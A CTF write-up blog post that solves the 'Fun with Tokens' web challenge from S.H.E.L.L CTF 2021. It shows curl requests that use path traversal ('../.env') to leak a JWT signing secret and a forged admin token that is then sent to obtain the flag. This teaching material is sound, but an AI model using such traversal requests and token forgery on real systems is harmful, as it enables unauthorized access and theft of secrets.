szymanski.ninja
About
CTF Writeups
Contact
pl|en

S.H.E.L.L CTF 2021: Fun with Tokens

Fun with Tokens

Category: Web Security

chal

482 points

I have got secret information that this webapp is vulnerable. Did i fail in verifying passwords ?
http://3.142.122.1:9334/

Solution

web

Login page is pretty similar to the one from login challenge.

login

Admins url gave me the file as below. 

0xd4127c3c
din_djarin11

I’ve also found an admin page.

admin

Intersting part in the login page is that after login attempt it sends token header, which seems to be JWT.

token

https://jwt.io is a nice tool to take a look into the token.

jwt

The values of username, password and admin are ROT13 encrypted. The value of admin is set to false. Obviously, I needed to forge a token with this value set to true. To do so I was missing secret to sign the token.

I found that /adminNames is in fact a redirect as below.

curl -vvvv http://3.142.122.1:9334/adminNames
*   Trying 3.142.122.1:9334...
* Connected to 3.142.122.1 (3.142.122.1) port 9334 (#0)
> GET /adminNames HTTP/1.1
> Host: 3.142.122.1:9334
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< X-Powered-By: Express
< Location: /getFile?file=admins
< Vary: Accept
< Content-Type: text/plain; charset=utf-8
< Content-Length: 42
< Date: Sun, 06 Jun 2021 09:44:56 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< 
* Connection #0 to host 3.142.122.1 left intact
Found. Redirecting to /getFile?file=admins

Found url doesn’t allow me to get the source of application.

curl http://3.142.122.1:9334/getFile?file=index.js
File name too big!

But I already knew it’s Express.js application and I gave a chance to get .env.

curl http://3.142.122.1:9334/getFile?file=../.env
secret=G00D_s0ld13rs_k33p_s3cret5

Is it my missing secret? ;-) To get the flag I had to login with login: din_djarin11 and password: 0xd4127c3c, change the admin value in JWT to gehr (it’s ROT13 encrypted true), sign the JWT and pass to the /admin address.

curl http://3.142.122.1:9334/admin -H 'Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InF2YV9xd25ldmExMSIsInBhc3N3b3JkIjoiMGtxNDEyN3AzcCIsImFkbWluIjoiZ2VociIsImlhdCI6MTYyMjk3MzIzMn0.zbFDHiyledBI3QoYbwB4n9OgX_r-bjMYRMafjr2qsxU'
Hey din_djarin11! Here's your flag: FURYY{G0x3af_q0_z4gg3e_4r91ns4506s384q460s0s0p6r9r5sr4n}

By ROT13 decrypting given string I’ve received flag.

Flag

SHELL{T3k6ns_d3_m7tt6r_7e24af7839f617d793f3f3c9e2e8fe7a}

Privacy Policy
luc © 2021